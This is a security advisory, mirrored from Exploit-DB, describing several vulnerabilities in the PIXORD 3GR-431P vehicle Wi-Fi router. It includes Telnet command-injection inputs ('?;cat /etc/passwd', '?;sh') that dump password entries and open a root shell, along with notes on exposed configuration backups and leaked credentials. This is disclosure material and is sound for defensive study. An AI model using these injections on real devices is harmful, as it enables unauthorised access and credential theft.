bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/38370.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

231 lines
No EOL
5.5 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple
Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor till date]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
# Version: [Model Name :3GR-431P]
[Software Version :RTA-A001_02]
[Wireless Driver Version :2.6.0.0]
*Vehicle 3G Wi-Fi Router - PIXORD *
http://www.pixord.com/en/products_show.php?show=17
*Device Info *
Model Name :3GR-431P
Software Version :RTA-A001_02
Wireless Driver Version :2.6.0.0
PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
router. It supports Internet access via 3G and receives position
information from GPS. 3GR-431P also supports two Ethernet ports for LAN
connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity.
It is available to install the 3GR-431P on the transportation. The
passengers can use the laptop or smart phone via Wi-Fi to browse the
Internet on the go. The Ethernet port also can connect IP camera to provide
the real time monitoring.
Vulnerability Impact: Easy and full device compromise. Access to configured
keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
vehicle via camera / connected devices.
*Multiple Security Vulnerabilities *
*1. OS command injection *
$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
Vehicle 3G Wi-Fi Router
Login: admin
Password:
>
> ?
mobile3G
mobileGPS
model
reboot
restoredefault
version
As seen above, only few specific, functional options are available for
device management.
However, we can bypass this and dump hashes easily.
> ?;cat /etc/passwd
sh: ?: not found
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
> exit
Note that this is also applicable when a non-admin user / support logs
in over the Telnet.
The web application lacks strict input validation and hence vulnerable to
OS command injection attack.
*2. Configuration not secured properly / AuthZ issues *
The device has three users - admin, support, user.
Apparently, there is no separation of privileges between these 3 users,
when accessing over HTTP(S). All options are available to all three then.
This allows 'user' /'support' to access device configuration file -
RT2880_Settings.dat. Configuration backup contains b64-encoded login
passwords + clear-text WPA keys + other sensitive information.
.. …
*Sensitive information in configuration file - *
*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
.....
<snip>
.....
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
.....
<snip>
.....
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
.....
<snip>
.....
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
.....
<snip>
.....
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
.....
<snip>
.....
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
.....
<snip>
.....
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
<snip>
RADIUS_Key1=<radius_key_here>
.....
<snip>
.....
Also, as observed in point 1 above, all the users have a UID 0, i.e. root
level privileges to the device:
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
The application should ideally provide specific privileges to different
users, and enforce strict access control.
*3. Application does not secure configured passwords (HTTPS) *
Masked password(s) can be retrieved via frame source (inspect element) and
/ or intercepting request via a proxy.
The application should mask/censure (*****) the passwords, keys and any
other crucial pieces of configuration and must not pass the values in
clear-text.
*4. Program / Scripts running in an insecure manner - leaking clear-text
passwords in process information *
After logging in to the device over Telnet, we can drop in to a shell via
OS command injection attack described in point 1.
> ?;sh
sh: ?: not found
Enter 'help' for a list of built-in commands.
BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
#
Checking running processes reveal a system program *inadyn*, which
apparently is a service for ddns connectivity, leaking valid username and
password in clear-text.
# ps aux
PID USER VSZ STAT COMMAND
1 admin 1768 S init
2 admin 0 RWN [ksoftirqd/0]
.....
<snip>
.....
2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>*
-a *<ddns_domain_here>*
4050 admin 1768 R ps aux
The programs should be run securely without passing cli arguments and
parameter values in clear-text.
--
Best Regards,
Karn Ganeshen
Reference in a new issue View git blame Copy permalink